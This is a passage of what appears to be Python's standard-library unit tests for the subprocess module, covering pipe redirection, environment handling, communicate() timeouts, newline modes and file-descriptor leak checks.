self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
raise unittest.SkitTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# Windows pipe size can be acquired via GetNamedPipeInfoFunction
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
p.stdout.close()
p.stderr.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
path_cmd = pathlib.Path("my-tool.py")
pathlib_cls = path_cmd.__class__.__name__
cases = [
("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
('a' * 100, True, 0,
"<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
(["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
(["ls", '--my-opts', 'a' * 100], False, None,
"<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
(path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
]
with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
for cmd, shell, code, sx in cases:
p = subprocess.Popen(cmd, shell=shell)
p.returncode = code
self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
